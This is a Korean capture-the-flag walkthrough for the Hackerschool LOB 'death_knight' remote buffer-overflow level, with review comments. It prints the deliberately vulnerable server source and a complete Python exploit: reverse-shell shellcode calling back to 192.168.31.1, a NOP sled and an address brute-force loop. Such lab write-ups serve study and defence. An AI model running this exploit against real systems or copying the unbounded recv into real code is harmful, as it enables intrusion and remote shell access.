해커스쿨 LOB LEVEL20 [xavius -> death_knight] 풀이
M4ndU
해커스쿨 LOB [xavius -> death_knight] 풀이입니다.
ID | xavius
PW | throw me away
으로 로그인합니다.
기본 셸이 \xff를 \x00으로 인식하는 오류를 피하기 위해 bash2를 사용합니다.
$ bash2
그리고
$ ls -l
를 이용해 어떤 파일과 어떤 폴더가 있는지 확인하고,
$ cat [문제이름].c
를 이용해 소스코드를 확인합시다.
login: xavius
Password:
[xavius@localhost xavius]$ bash2
[xavius@localhost xavius]$ ls -l
total 20
-rwsr-sr-x 1 death_kn death_kn 14134 Mar 30 2010 death_knight
-rw-r--r-- 1 root root 1409 Mar 30 2010 death_knight.c
[xavius@localhost xavius]$ cat death_knight.c
/*
The Lord of the BOF : The Fellowship of the BOF
- dark knight
- remote BOF
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <dumpcode.h>
/*
 * Challenge server: listens on TCP port 6666, forks one child per accepted
 * connection, sends two fixed prompt strings and reads a single reply.
 *
 * NOTE(review): intentionally vulnerable wargame target. The child reads up
 * to 256 bytes into the 40-byte stack array `buffer`, so any reply longer
 * than 40 bytes is written past the end of the array (stack buffer
 * overflow). The bounded form of that call is
 *     recv(client_fd, buffer, sizeof(buffer), 0)
 * with the return value checked.
 *
 * No return type is declared, so this relies on pre-C99 implicit int.
 */
main()
{
/* 40-byte receive buffer on main's stack frame. */
char buffer[40];
int server_fd, client_fd;
struct sockaddr_in server_addr;
struct sockaddr_in client_addr;
/* NOTE(review): accept() is normally declared with a socklen_t * length
 * argument; an int is passed here -- confirm against the target's headers. */
int sin_size;
if((server_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
perror("socket");
exit(1);
}
/* Bind to every local interface (INADDR_ANY) on port 6666. */
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(6666);
server_addr.sin_addr.s_addr = INADDR_ANY;
bzero(&(server_addr.sin_zero), 8);
if(bind(server_fd, (struct sockaddr *)&server_addr, sizeof(struct sockaddr)) == -1){
perror("bind");
exit(1);
}
if(listen(server_fd, 10) == -1){
perror("listen");
exit(1);
}
/* Accept loop: the parent never leaves it; only a forked child breaks out. */
while(1) {
sin_size = sizeof(struct sockaddr_in);
if((client_fd = accept(server_fd, (struct sockaddr *)&client_addr, &sin_size)) == -1){
perror("accept");
continue;
}
/* fork() returns 0 in the child, which handles this one client. */
if (!fork()){
/* The hard-coded lengths 52 and 6 equal the lengths of the two strings. */
send(client_fd, "Death Knight : Not even death can save you from me!\n", 52, 0);
send(client_fd, "You : ", 6, 0);
/* DEFECT: length 256 exceeds sizeof(buffer) == 40, so the peer controls up
 * to 216 bytes beyond the array. The return values of send() and recv()
 * are also ignored. */
recv(client_fd, buffer, 256, 0);
close(client_fd);
/* Leaves the accept loop: the child goes on to close(server_fd) and then
 * returns from main() immediately after the unbounded read. */
break;
}
/* Parent: drop its copy of the client socket and reap any exited children
 * without blocking (WNOHANG). */
close(client_fd);
while(waitpid(-1,NULL,WNOHANG) > 0);
}
close(server_fd);
}
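드디어 LOB 마지막 문제네요.
소스를 보니 6666번 포트에서 접속을 받는 서버이고, 40바이트짜리 buffer에 recv로 최대 256바이트를 받기 때문에 스택 버퍼 오버플로우가 발생합니다. 로컬이 아니라 원격으로 쉘을 따야 하는 것 같네요.
buffer의 위치를 확인하겠습니다. (아래 디스어셈블 결과에서 recv의 버퍼 인자가 [%ebp-40]이고 길이 인자가 0x100(256)인 것을 볼 수 있습니다.)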
...
0x8048a02 <main+318>: add %esp,16
0x8048a05 <main+321>: push 0
0x8048a07 <main+323>: push 0x100
0x8048a0c <main+328>: lea %eax,[%ebp-40]
0x8048a0f <main+331>: push %eax
0x8048a10 <main+332>: mov %eax,DWORD PTR [%ebp-48]
0x8048a13 <main+335>: push %eax
0x8048a14 <main+336>: call 0x804860c <recv>
# Proof-of-concept client for the death_knight challenge service (Python 2:
# note the print statement). It repeatedly connects to TCP port 6666 and
# sends one oversized reply per connection.
#
# NOTE(review), defender's reading: the reply is longer than the server's
# 40-byte buffer, so it only has an effect because the server calls recv()
# with a length of 256. Bounding that recv() to sizeof(buffer) removes the
# bug; a non-executable stack, address-space randomisation and stack
# protectors are the generic mitigations for this class of payload
# (presumably all absent on the wargame image -- the page does not say).
from socket import *
from struct import *

# 32-bit little-endian pack / unpack helpers. `p` is defined but not used in
# the visible script; `up` is only used to print the candidate address.
p = lambda x : pack("<L", x)
up = lambda x : unpack("<L", x)[0]

# Raw bytes spliced into the shellcode below. Decoded: 192.168.31.1 and
# 0xc738 (51000) in network byte order.
IPADDR = "\xc0\xa8\x1f\x01"
PORT = "\xc7\x38"

# Linux x86 machine code. NOTE(review): the byte patterns (int 0x80 with
# al=0x66 socketcall, al=0x3f dup2 in a 3-iteration loop, al=0x0b execve of
# "/bin//sh") look like a connect-back shell to IPADDR:PORT -- confirm by
# disassembling before relying on this description.
shellcode = (
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\xb0\x66\xb3\x01\x51\x6a\x06\x6a"
"\x01\x6a\x02\x89\xe1\xcd\x80\x89"
"\xc6\xb0\x66\x31\xdb\xb3\x02\x68"
+IPADDR+"\x66\x68"+PORT+"\x66\x53\xfe"
"\xc3\x89\xe1\x6a\x10\x51\x56\x89"
"\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"
"\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"
"\xc0\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"
"\x80"
)

# Walks the two low bytes of a 0xbfffXXXX address downwards, 0xff..0x01 each
# (0x00 is excluded by the range bounds), one TCP connection per candidate.
# Detection note: this produces up to 255*255 short-lived connections to port
# 6666, each carrying a run of 80 0x90 bytes -- both are easy to spot in
# connection logs or with a content signature.
for i in range(0xFF, 0x00, -1):
    for j in range(0xFF, 0x00, -1):
        # Layout: 44 filler bytes, a 4-byte little-endian address, 80 bytes
        # of 0x90, then the shellcode.
        payload="A"*44+chr(j)+chr(i)+"\xff\xbf"+"\x90"*80+shellcode
        print "addr : " + str(hex(up(chr(j)+chr(i)+"\xff\xbf")))
        s=socket(AF_INET, SOCK_STREAM)
        s.connect(("192.168.31.129", 6666))
        # Read the two server prompts (52 and 6 bytes, matching the send()
        # lengths in death_knight.c) before replying.
        s.recv(52)
        s.recv(6)
        s.send(payload)
        s.close()